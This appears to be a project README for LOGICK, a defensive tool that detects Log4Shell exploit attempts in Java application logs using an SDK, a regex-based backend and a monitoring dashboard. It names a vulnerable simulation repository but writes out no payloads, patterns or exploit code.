Team INSPIRE Organization: (Link)
LOGICK is a log-level security monitoring tool designed to detect Log4Shell and related Log4j exploit attempts directly from application logs. Instead of relying on network-level monitoring, LOGICK works where the attack actually appears — inside logs — allowing early detection of malicious payloads before serious damage occurs.
LOGICK provides a lightweight SDK that integrates with Java applications using Log4j. The SDK automatically captures logs, securely sends them to the LOGICK backend, and analyzes them using a regex-based detection engine to classify logs as safe, suspicious, or malicious. The results are displayed in a centralized dashboard for real-time monitoring and investigation. The malicious IPs are blocked and is also displayed on the dashboard.
This project demonstrates how legacy Java applications can be protected using log-level monitoring without modifying existing business logic.
LOGICK SDK A Java SDK published to Maven Central that integrates directly with Log4j-based applications. It captures logs and securely forwards them to the backend.
LOGICK Backend Server A Node.js server that receives logs, analyzes them using a regex detection engine, and stores structured results.
Detection Engine A regex-based signature detection engine that identifies Log4Shell payloads, including obfuscated and nested JNDI exploit patterns.
Dashboard A React-based web dashboard that visualizes logs, shows attack statistics, and helps users monitor application security in real time.
Log4j Simulation Environment A controlled vulnerable application used to simulate Log4Shell attacks and validate detection capability.
- The application integrates the LOGICK SDK.
- The SDK captures logs automatically from Log4j.
- Logs are securely sent to the LOGICK backend server.
- The detection engine analyzes logs using exploit signatures.
- Logs are classified as safe, suspicious, or malicious.
- Results are displayed in the LOGICK dashboard.
- Malicious IPs are blocked and dsplayed on the dashboard
| Repository | Description |
|---|---|
LogicK-NodeJs-Server |
Backend server for authentication, log ingestion, and analysis |
LogicK-sdk |
Java SDK that integrates with applications and sends logs |
logick-dashboard |
Frontend dashboard for monitoring and visualization |
lo4j-simulation |
Vulnerable Log4j application used to simulate exploit attacks |
Refer to the architecture diagram to understand how LOGICK components interact, including SDK integration, backend analysis, database storage, and dashboard visualization.
Architecture Diagram of LOGICK
Full technical documentation, SDK usage, architecture details, and detection engine explanation are available in the LOGICK GitBook.
GitBook Documentation: (Link)
LOGICK SDK: (Link)
Watch the complete demo showing exploit simulation, detection, and dashboard monitoring.
Demo Video: (Add your YouTube demo link here)
The LOGICK dashboard provides:
- Real-time log monitoring
- Attack detection visibility
- Malicious log identification
- Security analysis metrics
- Throttled IP details
- Detects Log4Shell exploit attempts in real time
- Lightweight Java SDK integration
- Regex-based signature detection engine
- Centralized log monitoring dashboard
- Secure authentication using client credentials
- Published SDK via Maven Central
- Designed for legacy Java application environments
LOGICK focuses on early detection at the log level, turning silent exploit attempts into visible alerts and helping organizations monitor vulnerable applications without requiring immediate patching.
